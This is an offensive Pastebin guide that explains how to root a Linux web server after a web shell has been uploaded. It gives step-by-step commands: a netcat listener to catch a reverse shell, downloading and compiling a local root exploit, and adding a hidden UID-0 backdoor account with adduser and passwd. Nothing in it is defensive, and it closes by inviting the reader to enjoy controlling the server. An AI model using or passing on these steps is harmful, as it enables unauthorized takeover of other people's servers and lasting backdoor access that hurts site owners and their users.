Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How to Root Linux Webserver using local root exploit.
- This guide will explain how to get root to a website using local root exploits.
- Youtube: Youtube.com/PhiberOptics
- Website: zarabyte.com
- Personal Website: MatthewHKnight.com
- Twitter: twitter.com/ZaraByte
- First off, we have to have a basic understanding of what root is. Root is basically the administrator of servers. With root, a person can delete files, copy files, add files, etc.
- Now,
- Check what kernel the server is using. This is shown on the shell that you uploaded. Or, you can Execute Case on the shell and execute uname -a for the same result.
- Netcat Download:
- http://netcat.sourceforge.net/ - For Linux
- http://joncraton.org/files/nc111nt.zip - For Windows
- Next, open up a port (I always use 443). Open netcat and type:
- -l -n -v -p 443
- Go back to your shell and go to backconnect. Enter the port you opened and press connect. It should then connect to your netcat.
- Now, you need to get the exploit link in netcat. It will download the zip to the server.
- If the exploit is downloaded as:
- Code:
- EXPLOITNAMEHERE.c
- Then simply compile it by
- gcc EXPLOITNAMEHERE.c -o EXPLOITNAMEHERE
- If it downloaded as EXPLOITNAMEHERE.zip, simply:
- unzip EXPLOITNAMEHERE.zip
- Now, let's get root, shall we?
- chmod 777 EXPLOITNAMEHERE
- Then run it...
- ./EXPLOITNAMEHERE
- Type:
- id (You can also do whoami)
- to see if you're root.
- Now, we'll add a new root user.
- Command is:
- adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M DESIREDROOTNAME
- Now, password for root (you're almost done):
- passwd DESIREDROOTNAME
- To check if you did it right, do:
- id DESIREDROOTNAME
- Now enjoy having fun control over the server.
- Check out the Local Root Exploit Namelist: http://pastebin.com/39P7NGKW
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement